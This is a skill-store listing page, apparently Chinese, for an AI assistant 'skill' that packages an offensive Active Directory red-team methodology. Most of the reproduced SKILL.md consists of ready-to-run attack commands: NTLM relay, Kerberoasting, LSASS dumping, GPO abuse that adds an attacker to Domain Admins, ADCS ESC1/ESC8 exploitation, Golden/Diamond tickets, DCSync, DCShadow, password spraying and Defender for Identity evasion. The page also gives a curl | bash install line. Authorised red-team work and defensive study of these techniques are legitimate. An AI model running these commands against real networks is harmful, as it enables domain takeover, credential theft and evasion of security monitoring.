‹ 首页

offensive-active-directory

@snailsploit · 收录于 1 周前 · 上游提交 2 个月前

Active Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments.

适合你,如果需要在内部网络中对Active Directory进行红队评估。

/ 下载安装
offensive-active-directory.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add snailsploit/claude-red/offensive-active-directory
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- snailsploit/claude-red/offensive-active-directory
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify snailsploit/claude-red/offensive-active-directory
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2669GitHub stars
~2.7K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 aeb41ec · 表述以原文为准
它做什么

装上后,Claude 会按照红队渗透流程,指导你完成 Active Directory 内网攻击,包括侦察、凭据窃取、权限提升、横向移动、持久化、域信任攻击、ADCS 滥用以及混合 AD/Entra ID 环境攻击。

什么时候触发

当你需要评估本地 AD、混合 AD/Entra ID 或 ADCS 部署的安全性时触发。

装好后可以这样说
技能原文 SKILL.md作者撰写 · MIT · aeb41ec

Active Directory — Offensive Testing Methodology

Quick Workflow
  1. Recon AD structure offline (BloodHound, ADExplorer snapshot) — minimize live queries
  2. Harvest creds via poisoning, Kerberoasting, ASREProast, or LSASS where allowed
  3. Map attack paths to Domain Admin / Enterprise Admin / Tier 0
  4. Execute path with lowest detection cost, validate at each hop
  5. Establish persistence and document every action with timestamps

Reconnaissance
BloodHound Collection
# SharpHound (CSharp collector) — most stealthy with throttling
SharpHound.exe -c All,GPOLocalGroup --Throttle 1000 --Jitter 30 --ZipFileName recon.zip

# Stealth collection (DC-only, avoids workstation noise)
SharpHound.exe -c DCOnly --Stealth

# Bloodhound.py from Linux (no Windows host needed)
bloodhound-python -d corp.local -u user -p pass -ns 10.0.0.1 -c All
PowerView (No Tool Drop)
# Domain enumeration without binaries
$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Get-DomainComputer -Unconstrained
Get-DomainGPO | ?{$_.gpcmachineextensionnames -match "Restricted Groups"}
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |
  ?{$_.ActiveDirectoryRights -match 'WriteDacl|GenericAll|WriteOwner'}
ADExplorer Offline
# Take snapshot from any low-priv user, analyze offline
ADExplorer.exe → File → Create Snapshot
# Convert to BloodHound format
ADExplorerSnapshot.py snapshot.dat -o output/

Credential Harvesting
LLMNR / NBT-NS / mDNS Poisoning
# Capture NetNTLMv2 hashes from broadcast resolution
responder -I eth0 -wrf

# Inveigh (Windows-side, when you have a foothold)
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTP Y

Crack with hashcat mode 5600. If cracking fails, relay instead.

NTLM Relay
# Identify relay targets (no SMB signing, LDAP signing not required)
nxc smb 10.0.0.0/24 --gen-relay-list relay-targets.txt

# Relay to LDAP/LDAPS for ACL abuse, ADCS for cert request
impacket-ntlmrelayx -tf relay-targets.txt -smb2support \
  --escalate-user attacker --delegate-access

# Relay to ADCS Web Enrollment (ESC8) — requires HTTP endpoint up
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
  --adcs --template DomainController
Kerberoasting
# Request TGS for all SPN-bearing accounts
Rubeus.exe kerberoast /outfile:tgs.txt /nowrap
# AES-only accounts (harder to crack but worth attempting)
Rubeus.exe kerberoast /aes /outfile:tgs_aes.txt
# Cross-platform from Linux
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.0.0.1 -request
hashcat -m 13100 tgs.txt rockyou.txt -r OneRuleToRuleThemAll.rule
ASREProasting
# Find users with DONT_REQUIRE_PREAUTH set
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.1 -no-pass
hashcat -m 18200 asrep.txt rockyou.txt
LSASS / SAM Dumping
:: Modern, AV-friendly: comsvcs.dll minidump
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\out.dmp full

:: Task Manager → lsass.exe → Create dump file (GUI route, no binary drop)

:: nanodump (handle duplication, no MiniDumpWriteDump)
nanodump.exe --pid <PID> -w lsass.dmp --valid

Parse with Mimikatz or pypykatz offline:

pypykatz lsa minidump lsass.dmp

Privilege Escalation Within AD
ACL Abuse

| Right | Abuse | |-------|-------| | GenericAll / GenericWrite | Add SPN → Kerberoast; reset password; add member | | WriteDacl | Grant yourself DCSync rights, then DCSync | | WriteOwner | Take ownership → grant rights → exploit | | AllExtendedRights (User) | Force password change | | AllExtendedRights (Domain) | DCSync | | AddMember | Add self to privileged group | | WriteSPN | Set SPN, kerberoast target |

# Targeted Kerberoast (write SPN, roast, remove SPN)
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/SPN'}
Rubeus.exe kerberoast /user:victim
Set-DomainObject -Identity victim -Clear serviceprincipalname

# Grant DCSync via WriteDacl
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' \
  -PrincipalIdentity attacker -Rights DCSync
Kerberos Delegation
# Find delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Unconstrained → wait for / coerce DC auth, capture TGT
Rubeus.exe monitor /interval:5 /nowrap

# Constrained (S4U2self/S4U2proxy) — impersonate any user to allowed SPN
Rubeus.exe s4u /user:svc_acct /rc4:<hash> /impersonateuser:Administrator \
  /msdsspn:cifs/dc.corp.local /ptt

# Resource-Based Constrained Delegation (RBCD) — write msDS-AllowedToActOnBehalfOfOtherIdentity
# Requires GenericAll/GenericWrite on the target computer object
Coercion Primitives

| Technique | Tool / RPC | |-----------|-----------| | PetitPotam | MS-EFSRPC (EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv) | | PrinterBug | MS-RPRN (RpcRemoteFindFirstPrinterChangeNotificationEx) | | DFSCoerce | MS-DFSNM (NetrDfsRemoveStdRoot) | | ShadowCoerce | MS-FSRVP | | WebDAV | Search-and-replace UNC path embedded in any web fetch |

# Coerce + relay full chain
impacket-ntlmrelayx -t ldap://dc -smb2support --delegate-access &
PetitPotam.py -u low -p pass attacker-ip dc-ip
# Result: RBCD set, S4U → DA on coerced machine
GPO Abuse
# Find GPOs you can edit
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
  ?{ $_.SecurityIdentifier -eq (Get-DomainUser current).objectsid `
     -and $_.ActiveDirectoryRights -match 'WriteProperty|WriteDacl' }

# SharpGPOAbuse — add scheduled task / immediate task to GPO
SharpGPOAbuse.exe --AddComputerTask --TaskName Update --Author NT\System \
  --Command cmd.exe --Arguments "/c net group 'Domain Admins' attacker /add /domain" \
  --GPOName "Workstation Policy"

ADCS Abuse — ESC1 through ESC15
Enumeration
certipy find -u user@corp.local -p pass -dc-ip 10.0.0.1 -vulnerable -stdout
Common Misconfigurations

| ID | Misconfig | Exploitation | |----|-----------|--------------| | ESC1 | Client Auth + ENROLLEE_SUPPLIES_SUBJECT | Request cert with arbitrary UPN | | ESC2 | Any Purpose EKU | Request cert valid for any use | | ESC3 | Enrollment Agent | Request agent cert, then on-behalf-of any user | | ESC4 | Vulnerable template ACL | Modify template to ESC1 | | ESC6 | EDITF_ATTRIBUTESUBJECTALTNAME2 on CA | SAN injection on any template | | ESC7 | Vulnerable CA ACL (ManageCA) | Approve own pending requests | | ESC8 | Web Enrollment HTTP + no EPA | NTLM relay → cert | | ESC9 | No security extension + UPN | UPN spoofing post-account-rename | | ESC10 | StrongCertificateBindingEnforcement weak | UPN spoofing without rename | | ESC11 | RPC unprotected (no ICertPassage IF_ENFORCEENCRYPTICERTREQUEST) | Relay over RPC | | ESC13 | Issuance policy linked to group | Cert grants group membership | | ESC14 | altSecurityIdentities write | Map attacker cert to admin | | ESC15 | EKUwu — schema v1 templates | Inject EKU at request time |

ESC1 Exploitation
# Request cert as Administrator
certipy req -u user@corp.local -p pass -ca CORP-CA -template VulnTemplate \
  -upn administrator@corp.local

# Use cert to get TGT and NT hash via UnPAC-the-Hash
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1
ESC8 (Web Enrollment Relay)
# Coerce any DC, relay to ADCS Web Enrollment, request DC cert
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
  --adcs --template DomainController &
PetitPotam.py attacker-ip dc.corp.local
# Result: cert for DC$ → TGT → DCSync

Lateral Movement
Pass-the-Hash / Overpass-the-Hash
# PTH with NT hash
nxc smb 10.0.0.0/24 -u admin -H <NThash> --local-auth
impacket-psexec corp/admin@target -hashes :<NThash>

# Overpass-the-Hash (NT hash → TGT, useful for Kerberos-only targets)
Rubeus.exe asktgt /user:admin /rc4:<NThash> /ptt
Pass-the-Ticket
# Inject TGT
Rubeus.exe ptt /ticket:base64.kirbi
# Or from .ccache
KRB5CCNAME=admin.ccache impacket-secretsdump -k -no-pass dc.corp.local
Silent Lateral Tools
# WinRM (no event logs in default channel for command exec)
evil-winrm -i target -u admin -H <hash>

# SMB exec without service creation (uses task scheduler)
impacket-atexec corp/admin@target -hashes :<hash> "whoami"

# WMI
impacket-wmiexec corp/admin@target -hashes :<hash>

# DCOM (MMC20.Application, ShellWindows, ShellBrowserWindow)
Invoke-DCOM -ComputerName target -Method MMC20 -Command "calc.exe"

Persistence
Golden Ticket (krbtgt forge)
# Requires krbtgt NT hash (from DCSync)
impacket-ticketer -nthash <krbtgt-NT> -domain-sid S-1-5-21-... -domain corp.local Administrator
KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass dc.corp.local
Silver Ticket (per-service forge)
# Forge TGS for a specific service using its account hash
impacket-ticketer -nthash <svc-NT> -domain-sid <SID> -domain corp.local \
  -spn cifs/server.corp.local Administrator
Diamond / Sapphire Ticket (modern, evades MDI on krbtgt)
# Diamond — modify legitimate TGT in-flight (no krbtgt hash on wire)
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512
DCSync
impacket-secretsdump -just-dc-user 'corp/krbtgt' corp/admin@dc -hashes :<hash>
# In-memory PowerShell variant (Mimikatz)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
DCShadow (register rogue DC, push changes)
mimikatz # !+
mimikatz # !processtoken
mimikatz # lsadump::dcshadow /object:CN=victim,... /attribute:primaryGroupID /value:519
mimikatz # lsadump::dcshadow /push
AdminSDHolder

Add ACE granting your account GenericAll on CN=AdminSDHolder,CN=System,DC=corp,DC=local. SDProp propagates to all protected groups every 60 minutes.


Forest & Trust Attacks
# Map trusts
Get-DomainTrust -SearchBase "DC=corp,DC=local"
Get-ForestTrust

# SID History injection (cross-forest if SID filtering disabled)
# ExtraSids in golden ticket → admin in trusted forest
impacket-ticketer -nthash <krbtgt> -domain-sid <child-SID> \
  -extra-sid S-1-5-21-<parent>-519 -domain child.corp.local Administrator

# Trust ticket forging (inter-realm TGT)
Rubeus.exe asktgs /service:krbtgt/parent.local /ticket:trust-ticket.kirbi

Hybrid AD / Entra ID (Azure AD) Pivots

| Pivot | Path | |-------|------| | AAD Connect server compromise | Dump MSOL_ account → DCSync on-prem | | Seamless SSO | Forge Kerberos ticket for AZUREADSSOACC$ → cloud SSO any user | | PTA agent | DLL hijack Microsoft.Azure.SecurityTokenService → harvest cleartext | | PHS hash sync | Read on-prem hashes from AAD Connect SQL (ADSync DB) | | Federated trust | Forge SAML token via stolen ADFS token-signing cert (Golden SAML) | | Pass-the-PRT | Steal PRT cookie from device → cloud session as user |

# AADInternals — Hybrid identity attack toolkit
Get-AADIntADSyncCredentials  # Extract MSOL_ creds from AAD Connect
Open-AADIntOffice365Portal -AccessToken $token
New-AADIntSAMLToken -ImmutableID 'a==' -Issuer 'http://sts/adfs/services/trust' \
  -PfxFileName 'token-signing.pfx'

Detection Evasion (MDI / Defender for Identity)

| MDI Detector | Evasion | |--------------|---------| | Honeytoken account access | Always check description and recent activity before hitting accounts | | Reconnaissance via SAMR | Use ADWS / LDAP-only collection, throttle | | Suspicious Kerberos delegation | Avoid noisy S4U2self chains on monitored DCs | | Golden/Silver Ticket detection | Use Diamond/Sapphire variants; match legitimate ticket lifetime/encryption | | DCSync from non-DC | Relay through legitimate replication-permitted accounts | | Pass-the-Hash | Use overpass-the-hash to convert to Kerberos before lateraling |

# Identify MDI sensors before noisy actions
Get-DomainComputer -SPN '*MicrosoftATA*'
Get-DomainComputer | ?{ $_.servicePrincipalName -match 'AATPSensor' }

Engagement Cheatsheet
# 1. Anonymous LDAP enum (no creds)
ldapsearch -x -H ldap://dc -s base -b "" "(objectclass=*)"
nxc ldap dc -u '' -p '' --users

# 2. Null SMB session
nxc smb dc -u '' -p '' --shares
impacket-rpcclient -U '' dc -no-pass

# 3. Password spray (low and slow)
nxc smb dc -u users.txt -p 'Winter2025!' --continue-on-success

# 4. Once authed: full enum + BloodHound
bloodhound-python -d corp.local -u user -p pass -ns dc -c All --zip

# 5. Identify attack path → execute → loot → persist

Key References
  • MITRE ATT&CK: TA0006 (Credential Access), TA0008 (Lateral Movement), T1558 (Steal/Forge Kerberos)
  • ADCS: SpecterOps "Certified Pre-Owned" (Schroeder, Christensen)
  • BloodHound: bloodhound.specterops.io
  • Coercion: github.com/p0dalirius/Coercer (unified coercion toolkit)
  • Source: https://github.com/SnailSploit/offensive-checklist/blob/main/active-directory.md
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。